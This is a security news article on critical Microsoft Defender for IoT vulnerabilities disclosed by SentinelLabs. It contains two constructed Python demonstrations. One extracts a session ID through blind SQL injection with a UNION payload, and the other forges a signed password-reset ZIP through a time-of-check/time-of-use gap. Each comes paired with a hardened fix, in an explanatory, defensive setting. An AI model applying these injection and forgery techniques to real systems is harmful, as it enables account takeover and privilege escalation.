Critical Vulnerabilities Found in Microsoft Defender for IoT

Researchers at endpoint security firm SentinelOne on Monday published detailed information on a couple of critical remote code execution vulnerabilities discovered in Microsoft Defender for IoT.

Designed with continuous network detection and response (NDR) capabilities, Defender for IoT supports various IoT, OT, and industrial control system (ICS) devices, and can be deployed both on-premises and in the cloud.

Tracked as CVE-2021-42311 and CVE-2021-42313, the two critical bugs have a CVSS score of 10 and were addressed by Microsoft with its December 2021 Patch Tuesday updates.

Both are SQL injection vulnerabilities that a remote attacker could exploit without authentication to achieve arbitrary code execution.

CVE-2021-42313 lies in the token validation process: the UUID parameter is not sanitized before it reaches the database query, SentinelLabs explains.


The researchers say the vulnerability allowed them to “insert, update, and execute SQL special commands.” They came up with proof-of-concept (PoC) code that exploits the bug to extract a logged-in user session ID from the database, which leads to complete account takeover.
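To make the class of bug concrete, the block below is an added, constructed example and not code from Defender for IoT or from SentinelLabs' PoC. It models a token-validation lookup that pastes an untrusted `uuid` parameter into SQL, shows how a caller who only gets a yes/no answer from the validator can still pull a session ID out of another table character by character, and contrasts it with a version that canonicalises the UUID and binds it as a query parameter. The table and column names (`api_tokens`, `sessions`, `session_id`), the sample rows and the session ID value are assumptions.

```python
"""Constructed example, not Defender for IoT code: a token-validation lookup
that interpolates an untrusted 'uuid' parameter into SQL, beside a version that
canonicalises the UUID and parameterises the query. Table and column names,
the sample rows and the session ID are assumptions."""
import sqlite3
import string
import uuid

VALID_UUID = "0f5c3f02-5b1e-4a2a-9d3e-1c2b3a4d5e6f"  # constructed sample value


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE api_tokens (uuid TEXT PRIMARY KEY, token TEXT NOT NULL);
        CREATE TABLE sessions (session_id TEXT PRIMARY KEY, username TEXT NOT NULL);
        INSERT INTO api_tokens VALUES ('0f5c3f02-5b1e-4a2a-9d3e-1c2b3a4d5e6f', 'tok-abc');
        INSERT INTO sessions VALUES ('sess-9f1e2d3c', 'cyberx');
        """
    )
    return con


def validate_token_vulnerable(con, uuid_param: str, token: str) -> bool:
    """Vulnerable: the caller-supplied UUID is pasted straight into the statement."""
    query = f"SELECT token FROM api_tokens WHERE uuid = '{uuid_param}'"
    row = con.execute(query).fetchone()
    return row is not None and row[0] == token


def validate_token_fixed(con, uuid_param: str, token: str) -> bool:
    """Hardened: reject anything that is not a UUID, then bind it as a parameter."""
    try:
        canonical = str(uuid.UUID(uuid_param))
    except ValueError:
        return False
    row = con.execute(
        "SELECT token FROM api_tokens WHERE uuid = ?", (canonical,)
    ).fetchone()
    return row is not None and row[0] == token


def extract_session_id_blind(con, validate=validate_token_vulnerable, max_len=64) -> str:
    """Boolean-based blind extraction through the validator's yes/no answer.

    The injected UNION makes the query return the literal 'known' (which we also
    pass as the token, so the comparison succeeds) only when the guessed prefix
    of session_id is correct. Against the hardened validator every payload is
    rejected and the function returns an empty string."""
    alphabet = string.ascii_lowercase + string.digits + "-"
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            guess = found + ch
            payload = (
                "' UNION SELECT 'known' FROM sessions "
                f"WHERE substr(session_id, 1, {len(guess)}) = '{guess}' -- "
            )
            if validate(con, payload, "known"):
                found = guess
                break
        else:
            return found  # no character extends the prefix: the value is complete
    return found


if __name__ == "__main__":
    db = make_db()
    print("legitimate login:", validate_token_vulnerable(db, VALID_UUID, "tok-abc"))
    print("session id leaked through vulnerable validator:", extract_session_id_blind(db))
    print("same attack against fixed validator:", repr(extract_session_id_blind(db, validate_token_fixed)))
```

The extraction loop never sees the session ID directly; it only observes whether the validator says yes or no, which is exactly the situation of an unauthenticated caller hitting a validation endpoint. The hardened version closes both gaps at once: `uuid.UUID()` refuses any string that is not a UUID, and the parameterised query means even a well-formed value cannot change the statement's structure.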


Also related to the token validation process, albeit performed by a different function, CVE-2021-42311 exists because an API token used for verification is shared across Defender for IoT installations.

SentinelLabs reported the critical vulnerabilities to Microsoft in June 2021 along with three other issues – two high-severity flaws in Microsoft Defender for IoT (CVE-2021-42312 and CVE-2021-42310) and a vulnerability in the RCDCAP open source project (CVE-2021-37222).

CVE-2021-42310, SentinelLabs explains, affects the password recovery mechanism of the Azure portal. That mechanism consists of a Python web API and a Java web API, and the interplay between the two is prone to a time-of-check/time-of-use (TOCTOU) vulnerability.


The mechanism relies on a signed password reset ZIP file that the user uploads on the password reset page. Because of the TOCTOU bug, an attacker could take a legitimately signed ZIP file issued to a different user and build from it a ZIP file carrying a malicious JSON payload.

The attack could be used to obtain the password for the privileged user cyberx (Microsoft acquired CyberX in 2020 and built Defender for IoT on its product), which could in turn lead to code execution with root privileges.
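The following block is an added illustration of the verify-then-use pattern behind this class of bug; it is constructed for this page and is not Defender for IoT code, nor a reproduction of the actual flaw. It models a reset flow that checks a signature over whatever archive is on disk and then re-reads the archive to act on it, so that anything swapped in between the two reads is accepted unverified, and places next to it a version that reads the bytes once, verifies those same bytes, and also binds the signed payload to the account being reset, so a ZIP signed for one user cannot be replayed for another. The entry names (`reset.json`, `reset.sig`), the JSON layout, the HMAC signing key and the `between_check_and_use` hook that stands in for the attacker's window are all assumptions.

```python
"""Constructed illustration, not Defender for IoT code: a time-of-check/
time-of-use gap in a 'signed password-reset ZIP' flow, beside a hardened
version. Entry names, JSON layout and the HMAC signing key are assumptions."""
import hashlib
import hmac
import io
import json
import os
import tempfile
import zipfile

SIGNING_KEY = b"constructed-demo-key"  # assumption: stands in for the real signing key


def _sign(data: bytes) -> str:
    return hmac.new(SIGNING_KEY, data, hashlib.sha256).hexdigest()


def _pack(data: bytes, sig: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("reset.json", data)
        zf.writestr("reset.sig", sig)
    return buf.getvalue()


def _unpack(zip_bytes: bytes):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read("reset.json"), zf.read("reset.sig").decode()


def _read_file(path: str) -> bytes:
    with open(path, "rb") as f:
        return f.read()


def build_reset_zip(payload: dict) -> bytes:
    """What a legitimate user would be issued: JSON plus a signature over it."""
    data = json.dumps(payload, sort_keys=True).encode()
    return _pack(data, _sign(data))


def build_forged_zip(payload: dict, signed_zip: bytes) -> bytes:
    """Attacker: keep another user's genuine signature, swap in attacker-chosen JSON."""
    _, stolen_sig = _unpack(signed_zip)
    return _pack(json.dumps(payload, sort_keys=True).encode(), stolen_sig)


def apply_reset_vulnerable(path: str, between_check_and_use=lambda: None):
    """Time of check: verify whatever is at `path`. Time of use: read `path` again.
    `between_check_and_use` is a test hook standing in for the attacker's window."""
    data, sig = _unpack(_read_file(path))
    if not hmac.compare_digest(_sign(data), sig):
        return None
    between_check_and_use()
    data, _ = _unpack(_read_file(path))  # fresh read; signature is not rechecked
    return json.loads(data)


def apply_reset_fixed(path: str, requesting_user: str, between_check_and_use=lambda: None):
    """Read once, verify those bytes, use those same bytes, and bind the signed
    payload to the account being reset so another user's signed ZIP is useless."""
    blob = _read_file(path)
    between_check_and_use()  # swapping the file now changes nothing
    data, sig = _unpack(blob)
    if not hmac.compare_digest(_sign(data), sig):
        return None
    payload = json.loads(data)
    if payload.get("user") != requesting_user:
        return None
    return payload


def demo() -> dict:
    """Run both flows against a constructed upload and report the outcomes."""
    path = os.path.join(tempfile.mkdtemp(), "upload.zip")
    good = build_reset_zip({"user": "alice", "new_password": "alice-pw"})
    forged = build_forged_zip({"user": "cyberx", "new_password": "pwned"}, good)

    def write(blob: bytes) -> None:
        with open(path, "wb") as f:
            f.write(blob)

    def swap() -> None:  # the attacker replaces the upload inside the window
        write(forged)

    results = {}
    write(good)
    p = apply_reset_vulnerable(path, between_check_and_use=swap)
    results["vulnerable_user_reset"] = p and p["user"]
    write(good)
    p = apply_reset_fixed(path, "alice", between_check_and_use=swap)
    results["fixed_user_reset"] = p and p["user"]
    write(forged)
    results["fixed_rejects_forged"] = apply_reset_fixed(path, "cyberx") is None
    write(good)
    results["fixed_rejects_other_users_zip"] = apply_reset_fixed(path, "cyberx") is None
    return results


if __name__ == "__main__":
    print(demo())
```

The two fixes are independent and both matter: reading once removes the window entirely, and checking that the signed payload names the account under reset is what stops a valid signature obtained for one user from being replayed against a privileged one.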

That foothold led the researchers to a simple command injection issue in the change-password mechanism, which Microsoft addressed as part of CVE-2021-42312.

“While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched, and checking access logs for irregularities,” SentinelLabs notes.


Written by Ionut Arghire, international correspondent for SecurityWeek.
